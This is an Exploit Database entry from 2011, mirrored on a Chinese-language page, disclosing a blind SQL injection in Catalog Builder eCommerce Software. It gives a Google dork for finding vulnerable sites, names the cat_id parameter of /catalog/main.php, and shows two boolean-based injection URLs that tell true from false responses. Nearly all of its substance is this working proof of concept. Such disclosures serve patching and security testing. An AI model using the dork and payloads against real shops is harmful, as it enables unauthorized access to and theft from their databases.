Catalog Builder eCommerce Software – Blind SQL Injection

• Exploit Database
• 10 阅读

• 作者： takeshix
  日期： 2011-06-16
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/17406/

• +------------------------------------------------------------------------------------------+
  |-------[ Catalog Builder - Ecommerce Software - Blind SQL Injection Vulnerability ]-------|
  +------------------------------------------------------------------------------------------+
  [+] Google Dork hint: inurl:'/catalog/main.php?cat_id='
  [+] Date: 16.06.2011
  [+] Author: takeshix
  [+] Author Contact: takeshix.query@googlemail.com
  [+] Software Link: http://www.catalogbuilder.ca/catalog/main.php
  [+] Tested on: Fedora
  [+] Platform: PHP
  --------------------------------------------------------------------------------------------
  
  vulnerable url:
  
  /catalog/main.php?cat_id=[blind sqli]
  
  example:
  
  http://localhost/catalog/main.php?cat_id=1' AND 1337=1337 AND 'takeshix'='takeshix true
  http://localhost/catalog/main.php?cat_id=1' AND 1337=1337 AND 'takeshix'='takeshixx false
  	
  
  --------------------------------------------------------------------------------------------
  [+] Greez to some members of UNITS & hackademics & DSU
  +------------------------------------------------------------------------------------------+
  |-------------------------------------[ hacktivistas ]-------------------------------------|
  +------------------------------------------------------------------------------------------+